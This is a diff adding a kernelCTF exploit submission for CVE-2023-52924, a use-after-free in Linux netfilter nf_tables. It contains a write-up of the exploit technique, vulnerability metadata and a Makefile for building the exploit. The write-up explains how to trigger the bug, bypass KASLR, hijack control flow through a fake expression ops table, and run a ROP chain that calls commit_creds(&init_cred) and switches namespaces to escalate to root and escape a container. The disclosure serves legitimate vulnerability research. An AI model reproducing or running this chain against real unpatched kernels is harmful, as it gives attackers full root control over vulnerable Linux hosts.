Add kernelCTF CVE-2023-52924_mitigation

Author: Mingi Cho

pocs/linux/kernelctf/CVE-2023-52924_mitigation/docs/exploit.md

@@ -0,0 +1,179 @@
+# Overview
+
+There is an asymmetry between commit/abort and preparation phase if the following conditions are met:
+
+1. set is a verdict map ("1.2.3.4 : jump foo")
+2. timeouts are enabled
+
+In this case, following sequence is problematic:
+
+1. element E in set S refers to chain C
+2. userspace requests removal of set S
+3. kernel does a set walk to decrement chain->use count for all elements from preparation phase
+4. kernel does another set walk to remove elements from the commit phase (or another walk to do a chain->use increment for all elements from abort phase)
+
+If E has already expired in 1), it will be ignored during list walk, so its use count won't have been changed.
+
+We can trigger a UAF from this vulnerability as follows. First, create a victim set and a victim chain, and create an immediate expr pointing to the victim chain to create a dangling pointer. At this point, the victim chain's reference count (`nft_chain->use`) is set to 1. Then, we add a set element which is configured short timeout to this victim set that points to the victim chain. Now, the reference count of the victim chain becomes 2. Next, we trigger the vulnerability by deleting the set twice. The first deletion decreases the reference count of the victim's chain, and the second deletion aborts the first deletion but does not increase the reference count of the chain. Additionally, the add set element is also aborted, reducing the reference count of the chain. The victim chain's reference count is now set to zero. Since the reference count of the victim chain is zero, the chain can be free. As a result, the victim chain is left as a dangling pointer in the immediate expr.
+
+# KASLR Bypass and Information Leak
+
+We used a timing side channel attack to leak the kernel base, and created a fake ops in the non-randomized CPU entry area (CVE-2023-0597) without leaking the heap address.
+
+# RIP Control
+
+```c
+struct nft_chain {
+    struct nft_rule_blob        __rcu *blob_gen_0;
+    struct nft_rule_blob        __rcu *blob_gen_1;
+    struct list_head        rules;
+    struct list_head        list;
+    struct rhlist_head        rhlhead;
+    struct nft_table        *table;
+    u64                handle;
+    u32                use;
+    u8                flags:5,
+                    bound:1,
+                    genmask:2;
+    char                *name;
+    u16                udlen;
+    u8                *udata;
+
+    /* Only used during control plane commit phase: */
+    struct nft_rule_blob        *blob_next;
+};
+```
+
+When the vulnerability is triggered, the freed `chain->blob_gen_0` can be accessed via `immediate expr`. We leave the chain freed and spray an object to create a fake blob in `blob_gen_0`.
+
+```c
+unsigned int
+nft_do_chain(struct nft_pktinfo *pkt, void *priv)
+{
+    ...
+do_chain:
+    if (genbit)
+        blob = rcu_dereference(chain->blob_gen_1);
+    else
+        blob = rcu_dereference(chain->blob_gen_0);
+
+    rule = (struct nft_rule_dp *)blob->data;
+    last_rule = (void *)blob->data + blob->size;
+next_rule:
+    regs.verdict.code = NFT_CONTINUE;
+    for (; rule < last_rule; rule = nft_rule_next(rule)) {
+        nft_rule_dp_for_each_expr(expr, last, rule) {
+            if (expr->ops == &nft_cmp_fast_ops)
+                nft_cmp_fast_eval(expr, &regs);
+            else if (expr->ops == &nft_cmp16_fast_ops)
+                nft_cmp16_fast_eval(expr, &regs);
+            else if (expr->ops == &nft_bitwise_fast_ops)
+                nft_bitwise_fast_eval(expr, &regs);
+            else if (expr->ops != &nft_payload_fast_ops ||
+                 !nft_payload_fast_eval(expr, &regs, pkt))
+                expr_call_ops_eval(expr, &regs, pkt);
+
+            if (regs.verdict.code != NFT_CONTINUE)
+                break;
+        }
+```
+
+```c
+static void expr_call_ops_eval(const struct nft_expr *expr,
+                   struct nft_regs *regs,
+                   struct nft_pktinfo *pkt)
+{
+#ifdef CONFIG_RETPOLINE
+    unsigned long e = (unsigned long)expr->ops->eval;
+#define X(e, fun) \
+    do { if ((e) == (unsigned long)(fun)) \
+        return fun(expr, regs, pkt); } while (0)
+
+    X(e, nft_payload_eval);
+    X(e, nft_cmp_eval);
+    X(e, nft_counter_eval);
+    X(e, nft_meta_get_eval);
+    X(e, nft_lookup_eval);
+    X(e, nft_range_eval);
+    X(e, nft_immediate_eval);
+    X(e, nft_byteorder_eval);
+    X(e, nft_dynset_eval);
+    X(e, nft_rt_get_eval);
+    X(e, nft_bitwise_eval);
+#undef  X
+#endif /* CONFIG_RETPOLINE */
+    expr->ops->eval(expr, regs, pkt);
+}
+```
+
+`chain->blob_gen_0` is used in `nft_do_chain`, and `expr->ops->eval` is called to evaluate the expression in `expr_call_ops_eval`. We set the ops of the fake expr to the CPU entry area to control the RIP. We allocate the fake blob object larger than 0x2000 to use page allocator.
+
+# Post-RIP
+
+The ROP payload is stored in `chain->blob_gen_0` which is allocated by page allocator.
+
+When `eval()` is called, `RBX` points to `chain->blob_gen_0+0x10`, which is the beginning of the `nft_expr` structure.
+
+```c
+void rop_chain(uint64_t* data){
+    int i = 0;
+
+    // nft_rule_blob.size > 0
+    data[i++] = 0x100;
+    // nft_rule_blob.dlen > 0
+    data[i++] = 0x100;
+
+    // fake ops addr
+    data[i++] = PAYLOAD_LOCATION(1) + offsetof(struct cpu_entry_area_payload, nft_expr_eval);
+
+    // current = find_task_by_vpid(getpid())
+    data[i++] = kbase + POP_RDI_RET;
+    data[i++] = getpid();
+    data[i++] = kbase + FIND_TASK_BY_VPID;
+
+    // current += offsetof(struct task_struct, rcu_read_lock_nesting)
+    data[i++] = kbase + POP_RSI_RET;
+    data[i++] = RCU_READ_LOCK_NESTING_OFF;
+    data[i++] = kbase + ADD_RAX_RSI_RET;
+
+    // current->rcu_read_lock_nesting = 0 (Bypass rcu protected section)
+    data[i++] = kbase + POP_RCX_RET;
+    data[i++] = 0;
+    data[i++] = kbase + MOV_RAX_RCX_RET;
+
+    // Bypass "schedule while atomic": set oops_in_progress = 1
+    data[i++] = kbase + POP_RDI_RET;
+    data[i++] = 1;
+    data[i++] = kbase + POP_RSI_RET;
+    data[i++] = kbase + OOPS_IN_PROGRESS;
+    data[i++] = kbase + MOV_RSI_RDI_RET;
+
+    // commit_creds(&init_cred)
+    data[i++] = kbase + POP_RDI_RET;
+    data[i++] = kbase + INIT_CRED;
+    data[i++] = kbase + COMMIT_CREDS;
+
+    // find_task_by_vpid(1)
+    data[i++] = kbase + POP_RDI_RET;
+    data[i++] = 1;
+    data[i++] = kbase + FIND_TASK_BY_VPID;
+
+    data[i++] = kbase + POP_RSI_RET;
+    data[i++] = 0;
+
+    // switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
+    data[i++] = kbase + MOV_RDI_RAX_RET;
+    data[i++] = kbase + POP_RSI_RET;
+    data[i++] = kbase + INIT_NSPROXY;
+    data[i++] = kbase + SWITCH_TASK_NAMESPACES;
+
+    data[i++] = kbase + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE;
+    data[i++] = 0;
+    data[i++] = 0;
+    data[i++] = _user_rip;
+    data[i++] = _user_cs;
+    data[i++] = _user_rflags;
+    data[i++] = _user_sp;
+    data[i++] = _user_ss;
+}
+```

pocs/linux/kernelctf/CVE-2023-52924_mitigation/docs/vulnerability.md

@@ -0,0 +1,12 @@
+- Requirements:
+	- Capabilities: CAP_NET_ADMIN
+	- Kernel configuration: CONFIG_NETFILTER, CONFIG_NF_TABLES
+	- User namespaces required: Yes
+- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9d0982927e79 (netfilter: nft_hash: add support for timeouts)
+- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=24138933b97b055d486e8064b4a1721702442a9b (netfilter: nf_tables: don't skip expired elements during walk)
+- Affected Version: v4.1 - v6.5
+- Affected Component: net/netfilter
+- Cause: Use-After-Free
+- Syscall to disable: disallow unprivileged username space
+- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-52924
+- Description: In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: don't skip expired elements during walk There is an asymmetry between commit/abort and preparation phase if the following conditions are met: 1. set is a verdict map ("1.2.3.4 : jump foo") 2. timeouts are enabled In this case, following sequence is problematic: 1. element E in set S refers to chain C 2. userspace requests removal of set S 3. kernel does a set walk to decrement chain->use count for all elements from preparation phase 4. kernel does another set walk to remove elements from the commit phase (or another walk to do a chain->use increment for all elements from abort phase) If E has already expired in 1), it will be ignored during list walk, so its use count won't have been changed. Then, when set is culled, ->destroy callback will zap the element via nf_tables_set_elem_destroy(), but this function is only safe for elements that have been deactivated earlier from the preparation phase: lack of earlier deactivate removes the element but leaks the chain use count, which results in a WARN splat when the chain gets removed later, plus a leak of the nft_chain structure. Update pipapo_get() not to skip expired elements, otherwise flush command reports bogus ENOENT errors.

pocs/linux/kernelctf/CVE-2023-52924_mitigation/exploit/mitigation-v3-6.1.55/Makefile

@@ -0,0 +1,35 @@
+LIBMNL_DIR = $(realpath ./)/libmnl_build
+LIBNFTNL_DIR = $(realpath ./)/libnftnl_build
+
+exploit:
+	gcc -o exploit exploit.c -L$(LIBNFTNL_DIR)/install/lib -L$(LIBMNL_DIR)/install/lib -lnftnl -lmnl -I$(LIBNFTNL_DIR)/libnftnl-1.2.5/include -I$(LIBMNL_DIR)/libmnl-1.0.5/include -static -s
+
+prerequisites: libmnl-build libnftnl-build
+
+libmnl-build : libmnl-download
+	tar -C $(LIBMNL_DIR) -xvf $(LIBMNL_DIR)/libmnl-1.0.5.tar.bz2
+	cd $(LIBMNL_DIR)/libmnl-1.0.5 && ./configure --enable-static --prefix=`realpath ../install`
+	cd $(LIBMNL_DIR)/libmnl-1.0.5 && make
+	cd $(LIBMNL_DIR)/libmnl-1.0.5 && make install
+
+libnftnl-build : libmnl-build libnftnl-download
+	tar -C $(LIBNFTNL_DIR) -xvf $(LIBNFTNL_DIR)/libnftnl-1.2.5.tar.xz
+	cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && PKG_CONFIG_PATH=$(LIBMNL_DIR)/install/lib/pkgconfig ./configure --enable-static --prefix=`realpath ../install`
+	cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && C_INCLUDE_PATH=$(C_INCLUDE_PATH):$(LIBMNL_DIR)/install/include LD_LIBRARY_PATH=$(LD_LIBRARY_PATH):$(LIBMNL_DIR)/install/lib make
+	cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && make install
+
+libmnl-download :
+	mkdir $(LIBMNL_DIR)
+	wget -P $(LIBMNL_DIR) https://netfilter.org/projects/libmnl/files/libmnl-1.0.5.tar.bz2 
+	
+libnftnl-download :
+	mkdir $(LIBNFTNL_DIR)
+	wget -P $(LIBNFTNL_DIR) https://netfilter.org/projects/libnftnl/files/libnftnl-1.2.5.tar.xz
+
+run:
+	./exploit
+
+clean:
+	rm -rf $(LIBMNL_DIR)
+	rm -rf $(LIBNFTNL_DIR)
+	rm -f exploit